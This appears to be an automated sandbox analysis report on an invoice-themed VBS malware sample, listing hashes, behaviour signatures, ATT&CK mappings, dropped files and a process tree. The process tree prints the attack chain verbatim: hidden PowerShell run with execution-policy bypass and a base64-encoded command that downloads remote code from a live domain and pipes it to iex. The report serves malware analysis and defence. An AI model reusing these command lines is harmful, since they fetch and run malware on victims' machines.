75341b24e7cbb26e63265647822e824f0574591755a589ceef2a91c4a72877c7

Analysis

max time kernel
134s
max time network
137s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
04/11/2024, 10:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Fattura88674084.vbs
Size

76KB
MD5

900728aa8935e1c237d057bc47a26dbd
SHA1

e99ab19dccdad0c566189fcf366be5674a90709a
SHA256

75341b24e7cbb26e63265647822e824f0574591755a589ceef2a91c4a72877c7
SHA512

3f511a2855d2cb8649c2d31a3ef913d19b8b7c6bf5bee5fb4912092c816045fac2164b54a301e74ce486826073c07614184614e7292bbd399d88e9125d97fee7
SSDEEP

1536:gOddhnd0wdhwdEZDqawdhwdIawdhwdFwq7Q2rr8LzdnGgrrTwdhwvwfcwdhwdGhp:gOddhnd0wdhwdEgawdhwdIawdhwd7WzW

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
35	5068	powershell.exe
39	5068	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3624	powershell.exe
692	powershell.exe
4448	powershell.exe
5068	powershell.exe
760	powershell.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
3624	powershell.exe
3624	powershell.exe
692	powershell.exe
692	powershell.exe
4448	powershell.exe
4448	powershell.exe
4448	powershell.exe
5068	powershell.exe
5068	powershell.exe
5068	powershell.exe
760	powershell.exe
760	powershell.exe
760	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	3624	powershell.exe
Token: SeDebugPrivilege	692	powershell.exe
Token: SeDebugPrivilege	4448	powershell.exe
Token: SeDebugPrivilege	5068	powershell.exe
Token: SeDebugPrivilege	760	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1528 wrote to memory of 3624	1528	WScript.exe	100
PID 1528 wrote to memory of 3624	1528	WScript.exe	100
PID 3624 wrote to memory of 964	3624	powershell.exe	103
PID 3624 wrote to memory of 964	3624	powershell.exe	103
PID 964 wrote to memory of 692	964	cmd.exe	104
PID 964 wrote to memory of 692	964	cmd.exe	104
PID 692 wrote to memory of 4448	692	powershell.exe	106
PID 692 wrote to memory of 4448	692	powershell.exe	106
PID 4448 wrote to memory of 5068	4448	powershell.exe	107
PID 4448 wrote to memory of 5068	4448	powershell.exe	107
PID 5068 wrote to memory of 760	5068	powershell.exe	108
PID 5068 wrote to memory of 760	5068	powershell.exe	108

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fattura88674084.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1528
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\Admin\AppData\Roaming\peXF7I6W.bat"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3624
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /q /cC:\Users\Admin\AppData\Roaming\peXF7I6W.bat
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:964
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -executionpolicy bypass -WindowStyle hidden -file "C:\Users\Admin\AppData\Roaming\peXF7I6W.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:692
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -WindowStyle hidden -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSINCg0KJEI1WG1qM0FOa0d1YTRiekVSYXlEID0gJCgtam9pbiAoKDY1Li45MCkgKyAoOTcuLjEyMikgfCBHZXQtUmFuZG9tIC1Db3VudCA1IHwgJSB7W2NoYXJdJF99KSk7DQokUGdvdG9YSzdQRk9Od0VjSmtyZWZsT3Zadzh5TU5PbE50d0lmczhRRTJMWCA9IFtpbnRdKEdldC1EYXRlIC1Gb3JtYXQgSEgpOw0KJElYSmxicVVXbXNaQTFtM0Vkc2IgPSBbaW50XShHZXQtRGF0ZSAtRm9ybWF0IG1tKTsNCiRJWEpsYnFVV21zWkExbTNFZHNiQWRkID0gMzsNCklmICgkSVhKbGJxVVdtc1pBMW0zRWRzYiArICRJWEpsYnFVV21zWkExbTNFZHNiQWRkIC1ndCA1OSkgew0KICAgICRQZ290b1hLN1BGT053RWNKa3JlZmxPdlp3OHlNTk9sTnR3SWZzOFFFMkxYID0gJFBnb3RvWEs3UEZPTndFY0prcmVmbE92Wnc4eU1OT2xOdHdJZnM4UUUyTFggKyAxOw0KICAgICRJWEpsYnFVV21zWkExbTNFZHNiID0gJElYSmxicVVXbXNaQTFtM0Vkc2IgKyAkSVhKbGJxVVdtc1pBMW0zRWRzYkFkZCAtIDYwOw0KfSBFbHNlIHsNCiAgICAkSVhKbGJxVVdtc1pBMW0zRWRzYiA9ICRJWEpsYnFVV21zWkExbTNFZHNiICsgJElYSmxicVVXbXNaQTFtM0Vkc2JBZGQ7DQp9Ow0KJFBnb3RvWEs3UEZPTndFY0prcmVmbE92Wnc4eU1OT2xOdHdJZnM4UUUyTFggPSBJZiAoW2ludF0oR2V0LURhdGUgLUZvcm1hdCBISCkgKyAxIC1ndCAyMykgeyIwMCJ9IEVsc2UgeyRQZ290b1hLN1BGT053RWNKa3JlZmxPdlp3OHlNTk9sTnR3SWZzOFFFMkxYfTsNCiRrcWRxS0Jzcm5OYTVRQ2VhaTJ6N3VuamRnZ05KNEMybTlSSmhmRVVVcFNDd0gzRkpYdHNqeENacCA9ICQoLWpvaW4gKCg2NS4uOTApICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgMTIgfCAlIHtbY2hhcl0kX30pKTsNCiRiZHV0MVlCOTAxVzJRcXFWYWkwYlZ6ak9OMGNWcnNZQXREZ0VkekM2d1pVY01tNTBrRWdmbUd1UUM4UEhkazcgPSBAIg0KJEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSINCmN1cmwgLXVzZWIgImh0dHA6Ly9naWJ1enV5Mzd2MnYudG9wLzEucGhwP3M9bWludHMxMyIgfCBpZXg7DQpSZW1vdmUtSXRlbSAiQzpcVXNlcnNcUHVibGljXERvY3VtZW50c1wkKCRrcWRxS0Jzcm5OYTVRQ2VhaTJ6N3VuamRnZ05KNEMybTlSSmhmRVVVcFNDd0gzRkpYdHNqeENacCkucHMxIiAtRm9yY2UgDQoiQDsNCg0KInBvd2Vyc2hlbGwgLW5vcHJvZmlsZSAtZXhlY3V0aW9ucG9saWN5IGJ5cGFzcyAtV2luZG93U3R5bGUgaGlkZGVuIC1jICQoJGJkdXQxWUI5MDFXMlFxcVZhaTBiVnpqT04wY1Zyc1lBdERnRWR6QzZ3WlVjTW01MGtFZ2ZtR3VRQzhQSGRrNykiIHwgT3V0LUZpbGUgLUZpbGVQYXRoICJDOlxVc2Vyc1xQdWJsaWNcRG9jdW1lbnRzXCQoJGtxZHFLQnNybk5hNVFDZWFpMno3dW5qZGdnTko0QzJtOVJKaGZFVVVwU0N3SDNGSlh0c2p4Q1pwKS5wczEiOw0KcG93ZXJzaGVsbCAtbm9wcm9maWxlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC1XaW5kb3dTdHlsZSBoaWRkZW4gLUZpbGUgQzpcVXNlcnNcUHVibGljXERvY3VtZW50c1wkKCRrcWRxS0Jzcm5OYTVRQ2VhaTJ6N3VuamRnZ05KNEMybTlSSmhmRVVVcFNDd0gzRkpYdHNqeENacCkucHMxDQpSZW1vdmUtSXRlbSAiJGVudjpBUFBEQVRBXCoucHMxIiAtRm9yY2UNClJlbW92ZS1JdGVtICIkZW52OkFQUERBVEFcKi5iYXQiIC1Gb3JjZQ0K')) | iex"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4448
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -File C:\Users\Public\Documents\mkxnGpuCZRXI.ps1
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:5068
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c Continue = Continue
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:760

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
360B

MD5
a09abffab24e860d4cc43759f9f2ff8e

SHA1
baf07d77079dd60c2f885f7437230b1cd4a1c49a

SHA256
c43abb4d495b0086274c38c37d4c553f3656e80e0f1f7490d2b924f77c8d29ff

SHA512
6ac558ea44c0cdfda1f346b317afd177fc82cdd4b0a5133e50f7d1a021bc54b82a1023926f2ae5254e3da9e6bdcb2e12a6c46b77eee201cac1d309e79abf8dcc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0ab03b4ab0ee8273a1eea28cef1ca1e7

SHA1
8a305ca40e71bd2b04b20c65e28730e3ff3f50b2

SHA256
695a48145171a84d61778fe33c410d3195109c7c59a2b1038a1f3ca14c52a3ed

SHA512
7347810d3c514b343def26aa42e4b758fc1cdd8a9e57c529de49615b995c8c1dab942d83d432a5ee6e022bbefd020d6b1d920ffa61a9ca2617ff8b67ce3c4f72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
50a8221b93fbd2628ac460dd408a9fc1

SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qvz5lurg.xoj.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\peXF7I6W.bat

Filesize
127B

MD5
c6a021f08a8c5305fe1d4a81bc1f9f9c

SHA1
59617f5d32da1aa502dea2620740239e8503e8fc

SHA256
2870aa1fba512420e4be8bb95ab774590865d2fc3a72eb705224d5998052dd29

SHA512
20e03e88cb31924bc09be5424c869ec9c3c047de0ffdb93536e559a6238f2cd5f61961332c05df7d5e2d89bd8d9d764f4f37c7b4c25da8333899cb106579318d

Download Submit
C:\Users\Admin\AppData\Roaming\peXF7I6W.ps1

Filesize
2KB

MD5
147ef0d82ea36819a864daecdeebb5ff

SHA1
992dc5221a2ed90d9c9e16b5131a9131c37468d5

SHA256
0c6ee146e29eecc1ab4ad248c9d744756b77d7dc729666439a64cef237d2315c

SHA512
0cbde25dd7904516074af8d8cc11bf5d0ad62c59ce720b7e377f7d83a8a3e7f9ff9219a64d9c333dc70dbbabe6dd6a2bd70fdb7f5fdefeeb28e396182c7267ae

Download Submit
C:\Users\Public\Documents\mkxnGpuCZRXI.ps1

Filesize
440B

MD5
ea171c6403800e6b6447f14ed33a5b76

SHA1
548b80715b85ccd1fa4b5dc0924b818baab4778a

SHA256
18ccd01252c78a18125e840d5b6acfe8e9a555b5961bed54ea0015272c4742af

SHA512
e5cd529318d3cdaf24e201f836939a193d2c0e10c9612246ef402d990f1482f3d3087650e354d983e64d4a7780f2ee34a80e55f36371787e14d8c51cf9b8d313

Download Submit
memory/692-28-0x00007FFC9C680000-0x00007FFC9D141000-memory.dmp

Filesize
10.8MB

Download
memory/692-26-0x00007FFC9C680000-0x00007FFC9D141000-memory.dmp

Filesize
10.8MB

Download
memory/692-25-0x00007FFC9C680000-0x00007FFC9D141000-memory.dmp

Filesize
10.8MB

Download
memory/692-67-0x00007FFC9C680000-0x00007FFC9D141000-memory.dmp

Filesize
10.8MB

Download
memory/3624-2-0x00007FFC9C683000-0x00007FFC9C685000-memory.dmp

Filesize
8KB

Download
memory/3624-14-0x00007FFC9C680000-0x00007FFC9D141000-memory.dmp

Filesize
10.8MB

Download
memory/3624-9-0x00007FFC9C680000-0x00007FFC9D141000-memory.dmp

Filesize
10.8MB

Download
memory/3624-3-0x0000024235BC0000-0x0000024235BE2000-memory.dmp

Filesize
136KB

Download
memory/3624-70-0x00007FFC9C680000-0x00007FFC9D141000-memory.dmp

Filesize
10.8MB

Download